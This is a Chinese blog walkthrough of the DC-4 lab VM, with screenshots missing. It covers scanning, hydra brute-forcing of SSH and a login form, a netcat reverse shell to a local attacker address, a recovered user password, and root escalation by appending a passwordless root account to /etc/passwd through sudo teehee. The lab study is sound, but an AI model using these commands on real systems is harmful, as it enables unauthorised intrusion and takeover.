码迷,mamicode.com
首页 > 其他好文 > 详细

DC-4靶机

时间:2020-05-07 19:49:44      阅读:79      评论:0      收藏:0      [点我收藏+]

标签:免密   vim   arp   shell   txt   name   成功   zip   lists   

仅供个人娱乐

靶机信息

下载地址:http://www.five86.com/downloads/DC-4.zip

一、主机扫描

arp-scan -l

nmap -p 1-65535 -A -sV 192.168.17.130

技术图片

二、信息收集

dirb http://192.168.17.130

技术图片
技术图片
技术图片
技术图片
技术图片

三、漏洞查找和利用

爆破ssh

hydra -L /root/user.txt -P /root/rockyou.txt -t 5 ssh://192.168.17.130

技术图片

字典设置太大了。

web页面

技术图片

爆破

技术图片
技术图片

或者使用hydra 爆破密码

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.17.130 http-post-form "/login.php:username=^USER^ password=^PASS^:S=logout" -F

登录成功

技术图片

信息收集

技术图片

抓包

技术图片
技术图片
技术图片
技术图片

可以反弹shell命令:

nc -e /bin/bash 192.168.17.129 4444

技术图片
技术图片

python -c ‘import pty;pty.spawn("/bin/bash")‘

技术图片

信息收集

技术图片
技术图片

复制 作为字典

技术图片

ssh登录

技术图片

查看信息

技术图片
技术图片

切换账户登录[charles:^xHhA&hvim0y]

技术图片

查看用户权限发现,该用户可以以root权限免密码执行 /usr/bin/teehee

技术图片

信息收集

技术图片

第一种获取权限方法

添加账户

echo test::0:0:::/bin/bash | sudo teehee -a /etc/passwd

tail -n 5 /etc/passwd

su test

技术图片
技术图片

DC-4靶机

标签:免密   vim   arp   shell   txt   name   成功   zip   lists   

原文地址:https://www.cnblogs.com/bingtang123/p/12838408.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!